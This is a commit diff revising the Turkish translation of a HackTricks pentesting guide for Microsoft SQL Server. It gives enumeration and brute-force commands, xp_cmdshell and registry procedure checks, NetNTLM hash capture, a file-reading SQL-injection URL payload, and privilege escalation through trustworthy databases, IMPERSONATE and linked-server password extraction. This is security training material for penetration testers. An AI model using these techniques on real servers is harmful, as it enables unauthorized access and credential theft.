Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

This commit is contained in:
Translator 2024-06-03 13:37:19 +00:00
parent bb14b0ee49
commit 753662b199

View file

@ -2,15 +2,15 @@
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hackleme öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan kahraman olmaya öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong> ile!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* **Şirketinizi HackTricks'te reklamınızı görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
* [**The PEASS Family**]'yi keşfedin (https://opensea.io/collection/the-peass-family), özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks** (https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>
@ -26,7 +26,7 @@ HackTricks'ı desteklemenin diğer yolları:
[wikipedia](https://en.wikipedia.org/wiki/Microsoft\_SQL\_Server)'dan:
> **Microsoft SQL Server**, Microsoft tarafından geliştirilen bir **ilişkisel veritabanı** yönetim sistemidir. Bir veritabanı sunucusu olarak, diğer yazılım uygulamaları tarafından istendiğinde veri depolama ve geri alma işlevini yerine getiren bir yazılım ürünüdür - bu uygulamalar ya aynı bilgisayarda ya da ağ üzerinde başka bir bilgisayarda (İnternet dahil) çalışabilir.\\
> **Microsoft SQL Server**, Microsoft tarafından geliştirilen bir **ilişkisel veritabanı** yönetim sistemidir. Bir veritabanı sunucusu olarak, diğer yazılım uygulamaları tarafından istendiğinde veri depolama ve geri alma işlevini yerine getiren bir yazılım ürünüdür - bu uygulamalar ya aynı bilgisayarda ya da ağ üzerindeki başka bir bilgisayarda (İnternet dahil) çalışabilir.\\
**Varsayılan port:** 1433
```
@ -34,9 +34,9 @@ HackTricks'ı desteklemenin diğer yolları:
```
### **Varsayılan MS-SQL Sistem Tabloları**
* **master Veritabanı**: Bu veritabanı, bir SQL Server örneği için tüm sistem düzeyi ayrıntıları yakalar ve kritiktir.
* **msdb Veritabanı**: SQL Server Agent, uyarılar ve işler için zamanlama yönetimini yönetmek için bu veritabanını kullanır.
* **model Veritabanı**: SQL Server örneğinde her yeni veritabanı için bir taslak olarak hareket eder, burada boyut, karşılaştırma, kurtarma modeli ve daha fazlası gibi herhangi bir değişiklik, yeni oluşturulan veritabanlarında yansıtılır.
* **master Veritabanı**: Bu veritabanı, bir SQL Server örneği için tüm sistem düzeyi ayrıntıları yakalar ve hayati öneme sahiptir.
* **msdb Veritabanı**: SQL Server Agent, uyarılar ve işler için zamanlamayı yönetmek için bu veritabanını kullanır.
* **model Veritabanı**: SQL Server örneğindeki her yeni veritabanı için bir taslak olarak hareket eder, burada boyut, karşılaştırma, kurtarma modeli ve daha fazlası gibi herhangi bir değişiklik, yeni oluşturulan veritabanlarında yansıtılır.
* **Resource Veritabanı**: SQL Server ile birlikte gelen sistem nesnelerini barındıran salt okunur bir veritabanıdır. Bu nesneler, Fiziksel olarak Kaynak veritabanında depolanmış olsalar da, her veritabanının sys şemasında mantıksal olarak sunulur.
* **tempdb Veritabanı**: Geçici nesneler veya ara sonuç kümeleri için geçici bir depolama alanı olarak hizmet verir.
@ -50,10 +50,10 @@ nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config
msf> use auxiliary/scanner/mssql/mssql_ping
```
{% hint style="info" %}
Eğer **kimlik bilgileriniz yoksa**, onları tahmin etmeyi deneyebilirsiniz. Nmap veya metasploit'i kullanabilirsiniz. Dikkatli olun, var olan bir kullanıcı adını kullanarak birkaç kez giriş yapmada başarısız olursanız, hesapları **engelleyebilirsiniz**.
Eğer **kimlik bilgileriniz yoksa**, onları tahmin etmeyi deneyebilirsiniz. Nmap veya metasploit kullanabilirsiniz. Dikkatli olun, var olan bir kullanıcı adını kullanarak birkaç kez giriş yapmada başarısız olursanız, hesapları **bloklatabilirsiniz**.
{% endhint %}
#### Metasploit (kimlik bilgisi gereklidir)
#### Metasploit (kimlik bilgileri gereklidir)
```bash
#Set USERNAME, RHOSTS and PASSWORD
#Set DOMAIN and USE_WINDOWS_AUTHENT if domain is used
@ -104,7 +104,7 @@ sqsh -S <IP> -U .\\<Username> -P <Password> -D <Database>
1> select 1;
2> go
```
#### Ortak Sıralama
#### Ortak Numaralandırma
```sql
# Get version
select @@version;
@ -156,7 +156,7 @@ SELECT * FROM sysusers
* **Sunucu** Örnekler arasında veritabanları, girişler, uç noktalar, kullanılabilirlik grupları ve sunucu rolleri bulunur.
* **Veritabanı** Örnekler veritabanı rolü, uygulama rolleri, şema, sertifikalar, tam metin katalogları ve kullanıcıları kapsar.
* **Şema** Tabloları, görünümleri, prosedürleri, işlevleri, sinonimleri vb. içerir.
2. **İzin:** SQL Server korunabilirleri ile ilişkilendirilen izinler arasında ALTER, CONTROL ve CREATE gibi izinler bir prensibe verilebilir. İzinlerin yönetimi iki seviyede gerçekleşir:
2. **İzin:** SQL Server korunabilirleri ile ilişkilendirilen izinler, ALTER, CONTROL ve CREATE gibi izinler bir prensibe verilebilir. İzinlerin yönetimi iki seviyede gerçekleşir:
* **Sunucu Düzeyi** girişler kullanılarak
* **Veritabanı Düzeyi** kullanıcılar kullanılarak
3. **Prensipal:** Bu terim, bir korunabilir için izin verilen varlığı ifade eder. Prensipaller genellikle girişler ve veritabanı kullanıcılarını içerir. Korunabilirlerin erişimine kontrol, izinlerin verilmesi veya reddedilmesi veya erişim haklarına sahip roller içeren girişlerin ve kullanıcıların dahil edilmesi yoluyla gerçekleştirilir.
@ -179,12 +179,12 @@ SELECT IS_SRVROLEMEMBER('sysadmin');
Use master
EXEC sp_helprotect 'xp_cmdshell'
```
## Hileler
## Püf Noktaları
### İşletim Sistemi Komutları Yürütme
### İşletim Sistemi Komutları Çalıştırma
{% hint style="danger" %}
Komutları yürütebilmek için **`xp_cmdshell`**'in **etkin** olması yeterli değildir, aynı zamanda **`xp_cmdshell` depolanan prosedüründe EXECUTE iznine sahip olmak** da gereklidir. Kimlerin (sysadmin'ler hariç) **`xp_cmdshell`**'i kullanabileceğini alabilirsiniz:
Komutları çalıştırabilmek için **`xp_cmdshell`**'in **etkin** olması yeterli değildir, aynı zamanda **`xp_cmdshell` depolanan prosedüründe **EXECUTE** iznine sahip olmak** da gereklidir. Kimlerin (sysadmin'ler hariç) **`xp_cmdshell`**'i kullanabileceğini alabilirsiniz:
```sql
Use master
EXEC sp_helprotect 'xp_cmdshell'
@ -241,14 +241,14 @@ EXEC sp_helprotect 'xp_fileexist';
```
{% endhint %}
**Responder** veya **Inveigh** gibi araçları kullanarak **NetNTLM hash'ini çalmak** mümkündür.\
**responder** veya **Inveigh** gibi araçları kullanarak **NetNTLM hash'ini çalmak** mümkündür.\
Bu araçları nasıl kullanacağınızı aşağıdaki bağlantıda görebilirsiniz:
{% content-ref url="../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md" %}
[spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md](../../generic-methodologies-and-resources/pentesting-network/spoofing-llmnr-nbt-ns-mdns-dns-and-wpad-and-relay-attacks.md)
{% endcontent-ref %}
### MSSQL Güvenilen Bağlantıları Kötüye Kullanma
### MSSQL Güvenilir Bağlantıları Kötüye Kullanma
Bu özelliği nasıl kötüye kullanacağınız hakkında daha fazla bilgi edinmek için [**bu yazıyı okuyun**](../../windows-hardening/active-directory-methodology/abusing-ad-mssql.md):
@ -282,7 +282,7 @@ Varsayılan olarak, `MSSQL`, hesabın okuma erişimine sahip olduğu işletim si
```sql
SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents
```
Ancak, **`BULK`** seçeneği **`ADMINISTER BULK OPERATIONS`** veya **`ADMINISTER DATABASE BULK OPERATIONS`** iznini gerektirir.
Ancak, **`BULK`** seçeneği **`ADMINISTER BULK OPERATIONS`** veya **`ADMINISTER DATABASE BULK OPERATIONS`** iznine ihtiyaç duyar.
```sql
# Check if you have it
SELECT * FROM fn_my_permissions(NULL, 'SERVER') WHERE permission_name='ADMINISTER BULK OPERATIONS' OR permission_name='ADMINISTER DATABASE BULK OPERATIONS';
@ -293,9 +293,9 @@ https://vuln.app/getItem?id=1+and+1=(select+x+from+OpenRowset(BULK+'C:\Windows\w
```
### **RCE/Dosyaları okuma betiklerini yürütme (Python ve R)**
MSSQL, **Python ve/veya R betiklerini** yürütmenize izin verebilir. Bu kodlar, komutları yürütmek için **xp\_cmdshell** kullanan kullanıcıdan **farklı bir kullanıcı** tarafından yürütülecektir.
MSSQL, **Python ve/veya R betiklerini yürütmenize izin verebilir**. Bu kodlar, komutları yürütmek için **xp\_cmdshell** kullanan kullanıcıdan **farklı bir kullanıcı** tarafından yürütülecektir.
Örnek olarak **'R'** _"Hellow World!"_ **çalışmıyor**:
Örnek olarak **'R'** ile _"Merhaba Dünya!"_ **çalışmıyor**:
![](<../../.gitbook/assets/image (393).png>)
@ -315,7 +315,7 @@ GO
```
### Registry'i Oku
Microsoft SQL Server, **çoklu genişletilmiş saklı prosedürler** sağlar, bu da sadece ağ ile etkileşime girmenizi değil, aynı zamanda dosya sistemi ve hatta [**Windows Registry**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server/)** ile de etkileşimde bulunmanıza olanak tanır:**
Microsoft SQL Server, **çoklu genişletilmiş depolama prosedürleri** sağlar, bu prosedürler sayesinde sadece ağ ile etkileşimde bulunmakla kalmaz, aynı zamanda dosya sistemi ve hatta [**Windows Registry**](https://blog.waynesheffield.com/wayne/archive/2017/08/working-registry-sql-server)** ile de etkileşimde bulunabilirsiniz:**
| **Normal** | **Örnek Duyarlı** |
| ---------------------------- | -------------------------------------- |
@ -342,19 +342,19 @@ EXEC sp_helprotect 'xp_regwrite';
### MSSQL Kullanıcı Tanımlı Fonksiyon ile RCE - SQLHttp <a href="#mssql-user-defined-function-sqlhttp" id="mssql-user-defined-function-sqlhttp"></a>
Özel fonksiyonlarla birlikte bir .NET dll'si **MSSQL içinde yüklenebilir**. Bunun için **`dbo` erişimi gerektirir**, bu yüzden veritabanına bağlantı **`sa` veya Yönetici rolü olarak** yapılmalıdır.
Özel fonksiyonlarla birlikte **.NET dll'sini MSSQL içinde yüklemek mümkündür**. Bunun için **`dbo` erişimi gerektirir**, bu yüzden veritabanına bağlantı **`sa` veya Yönetici rolü olarak** gereklidir.
Bir örneği görmek için [**bu bağlantıyı takip edin**](../../pentesting-web/sql-injection/mssql-injection.md#mssql-user-defined-function-sqlhttp).
### RCE için Diğer Yöntemler
Komut yürütme elde etmek için [uzatılmış depolama prosedürleri](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assembly'ler](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent İşleri](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15) ve [harici betikler](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql) eklemek gibi diğer yöntemler bulunmaktadır.
Komut yürütme elde etmek için diğer yöntemler de vardır, örneğin [genişletilmiş depolanan prosedürler eklemek](https://docs.microsoft.com/en-us/sql/relational-databases/extended-stored-procedures-programming/adding-an-extended-stored-procedure-to-sql-server), [CLR Assembly'ler](https://docs.microsoft.com/en-us/dotnet/framework/data/adonet/sql/introduction-to-sql-server-clr-integration), [SQL Server Agent İşleri](https://docs.microsoft.com/en-us/sql/ssms/agent/schedule-a-job?view=sql-server-ver15) ve [harici betikler](https://docs.microsoft.com/en-us/sql/relational-databases/system-stored-procedures/sp-execute-external-script-transact-sql).
## MSSQL Yetki Yükseltme
### db\_owner'dan sysadmin'e
Eğer bir **normal kullanıcı**ye bir **`db_owner`** rolü verilirse ve bu rolü **bir yöneticiye ait** olan bir veritabanına sahipse (örneğin **`sa`**), ve bu veritabanı **`trustworthy`** olarak yapılandırılmışsa, bu kullanıcı bu ayrıcalıkları **yetki yükseltme** için kötüye kullanabilir çünkü orada oluşturulan **saklanmış prosedürler** sahibi olarak (**yönetici**) **çalıştırılabilir**.
Eğer bir **normal kullanıcıya** bir **`db_owner`** rolü verilirse ve bu rolü **bir yöneticiye ait** olan bir veritabanına (örneğin **`sa`**) sahip olursa ve bu veritabanı **`trustworthy`** olarak yapılandırılmışsa, bu kullanıcı bu ayrıcalıkları **yetki yükseltme** için kötüye kullanabilir çünkü orada oluşturulan **depolanmış prosedürler** sahibi olarak (**yönetici**) **çalıştırılabilir**.
```sql
# Get owners of databases
SELECT suser_sname(owner_sid) FROM sys.databases
@ -400,7 +400,7 @@ Invoke-SqlServerDbElevateDbOwner -SqlUser myappuser -SqlPass MyPassword! -SqlSer
```
### Diğer kullanıcıların taklit edilmesi
SQL Server'ın **`IMPERSONATE`** adında özel bir izni vardır. Bu izin, **yürütülen kullanıcının başka bir kullanıcının izinlerini veya girişini almasına izin verir** ve bağlam sıfırlanana veya oturum sona erene kadar devam eder.
SQL Server'ın **`IMPERSONATE`** adında özel bir izni vardır. Bu izin, **yürütülen kullanıcının başka bir kullanıcının izinlerini veya oturum açma bilgilerini almasına izin verir** ve bu durum sıfırlanana veya oturum sona erene kadar devam eder.
```sql
# Find users you can impersonate
SELECT distinct b.name
@ -445,9 +445,9 @@ Invoke-SqlServer-Escalate-ExecuteAs -SqlServerInstance 10.2.9.101 -SqlUser myuse
## SQL Server Bağlı Sunuculardan Şifrelerin Çıkarılması
Bir saldırgan, SQL Sunucu Bağlı Sunucularından şifreleri çıkarabilir ve bunlarıık metin olarak alarak hedef üzerinde daha büyük bir hak elde etmek için kullanabilir. Bağlı Sunucular için depolanan şifreleri çıkarmak ve şifreleri çözmek için kullanılabilecek betik [burada](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords) bulunabilir.
Bir saldırgan, SQL Sunucu Bağlı Sunucularından şifreleri çıkarabilir ve bunlarıık metin olarak alarak hedef üzerinde daha büyük bir hak elde etmek için kullanabilir. Bağlı Sunucular için depolanan şifreleri çıkarmak ve şifrelemek için kullanılan betik [burada bulunabilir](https://www.richardswinbank.net/admin/extract\_linked\_server\_passwords)
Bu saldırının çalışabilmesi için bazı gereksinimler ve yapılandırmalar yapılmalıdır. İlk olarak, makinede Yönetici haklarına sahip olmalısınız veya SQL Server Yapılandırmalarını yönetme yeteneğine sahip olmalısınız.
Bu saldırının çalışabilmesi için bazı gereksinimler ve yapılandırmalar yapılmalıdır. İlk olarak, makinede Yönetici haklarına sahip olmalısınız veya SQL Sunucu Yapılandırmalarını yönetme yeteneğine sahip olmalısınız.
İzinlerinizi doğruladıktan sonra, aşağıdakileri yapılandırmanız gerekmektedir:
@ -455,7 +455,7 @@ Bu saldırının çalışabilmesi için bazı gereksinimler ve yapılandırmalar
2. Bir Başlangıç parametresi ekleyin, bu durumda eklenen bir izleme bayrağı olacaktır, yani -T7806.
3. Uzak yönetici bağlantısını etkinleştirin.
Bu yapılandırmaları otomatikleştirmek için [bu depo](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) gerekli betiklere sahiptir. Yapılandırma adımlarının her biri için bir PowerShell betiği bulunmasının yanı sıra, depoda yapılandırma betiklerini ve şifrelerin çıkarılması ve çözülmesini birleştiren tam bir betik de bulunmaktadır.
Bu yapılandırmaları otomatikleştirmek için [bu depo](https://github.com/IamLeandrooooo/SQLServerLinkedServersPasswords/) gerekli betiklere sahiptir. Yapılandırma adımlarının her biri için bir PowerShell betiği bulunan depo, ayrıca yapılandırma betiklerini ve şifrelerin çıkarılması ve şifrelerin şifrelenmesini birleştiren tam bir betiğe de sahiptir.
Daha fazla bilgi için bu saldırıyla ilgili aşağıdaki bağlantılara başvurun: [MSSQL Veritabanı Bağlantı Sunucusu Şifrelerinin Şifrelenmesi](https://www.netspi.com/blog/technical/adversary-simulation/decrypting-mssql-database-link-server-passwords/)
@ -464,7 +464,7 @@ Daha fazla bilgi için bu saldırıyla ilgili aşağıdaki bağlantılara başvu
## Yerel Yetki Yükseltme
MSSQL sunucusunu çalıştıran kullanıcı, **SeImpersonatePrivilege** ayrıcalık belirtecinin etkinleştirilmiş olacaktır.\
Büyük olasılıkla, bu 2 sayfadan birini takip ederek **Yöneticiye yükselme** yeteneğine sahip olacaksınız:
Büyük olasılıkla, bu 2 sayfadan birini takip ederek **Yöneticiye yükseltebilirsiniz**:
{% content-ref url="../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md" %}
[roguepotato-and-printspoofer.md](../../windows-hardening/windows-local-privilege-escalation/roguepotato-and-printspoofer.md)
@ -552,14 +552,14 @@ Command: msfconsole -q -x 'use auxiliary/scanner/mssql/mssql_ping; set RHOSTS {I
```
<details>
<summary><strong>Sıfırdan kahraman olmaya kadar AWS hacklemeyi öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary><strong>AWS hacklemeyi sıfırdan kahraman seviyesine öğrenin</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks'ı desteklemenin diğer yolları:
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**](https://github.com/sponsors/carlospolop)'na göz atın!
* **Şirketinizi HackTricks'te reklamını görmek istiyorsanız** veya **HackTricks'i PDF olarak indirmek istiyorsanız** [**ABONELİK PLANLARI**]'na göz atın (https://github.com/sponsors/carlospolop)!
* [**Resmi PEASS & HackTricks ürünlerini**](https://peass.creator-spring.com) edinin
* [**The PEASS Family'yi**](https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**](https://opensea.io/collection/the-peass-family) koleksiyonumuz
* **Katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına.
* [**The PEASS Family**]'yi (https://opensea.io/collection/the-peass-family) keşfedin, özel [**NFT'lerimiz**]'i (https://opensea.io/collection/the-peass-family) içeren koleksiyonumuzu
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) katılın veya [**telegram grubuna**](https://t.me/peass) katılın veya bizi **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**'da takip edin.**
* **Hacking püf noktalarınızı paylaşarak PR göndererek HackTricks** (https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github depolarına katkıda bulunun.
</details>